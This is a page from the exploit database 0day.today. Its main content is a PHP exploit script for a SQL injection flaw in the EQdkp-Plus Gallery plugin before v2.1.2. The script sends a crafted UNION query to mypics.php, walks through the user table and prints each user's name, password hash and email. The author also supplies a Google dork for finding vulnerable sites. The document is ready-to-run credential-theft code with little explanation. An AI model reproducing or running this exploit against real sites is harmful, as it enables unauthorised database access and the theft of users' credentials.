0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabilty
============================================================ EQdkp-Plus Gallery < v2.1.2 Blind SQL Injection Vulnerabilty ============================================================ #!/bin/php <?php /* ###################################################################### # _ _ _ _ # # | | | | | | | | # # | |__ _ _| |_ ___| |__ _ _ _ __ | | _____ _ __ # # | '_ \| | | | __/ _ \ '_ \| | | | '_ \| |/ / _ \ '__| # # | |_) | |_| | || __/ |_) | |_| | | | | < __/ | # # |_.__/ \__, |\__\___|_.__/ \__,_|_| |_|_|\_\___|_| # # __/ | by jiuX # # |___/ # ###################################################################### # Name : EQdkp-Plus Gallery < v2.1.2 # Date : 10.07.2010 # Platform: Linux/Windows # Vendor : Badtwin & Lunary # Google Dork: > "EQDKP Plus" inurl:mypics.php < # greetz to : x2k, medison, x33, bl4ckn3ss, Luk ... ###################################################################### */ $x = $argv[1]."/portal/plugins/gallery/mypics.php?pid=-1337+and+1=0+union+select+1,2,concat%280x62797465,username,0x3A,user_password,0x3A,user_email,0x62756e6b6572%29,4,5,6,7,8+from+eqdkp_users"; function b($b,$c) { $b = file_get_contents($b."+limit+".$c.",1--%20-"); preg_match_all("/byte(.*)bunker/",$b,$w, PREG_PATTERN_ORDER); $w = explode(":",$w[1][0]); if (!$w[0]=="") { echo "ID: ".$c."\nUsername: ".$w[0]."\n";echo "Password: ".$w[1]."\n";echo "E-Mail: ".$w[2]."\n-----------------------\n";return true; }else{return false;}} echo "-----------------------\nChecking: ".$argv[1]."\n-----------------------\n"; $i=0;$bb=true;while($bb == true){ $bb = b($x,$i); $i++; } # 0day.today [2024-07-05] #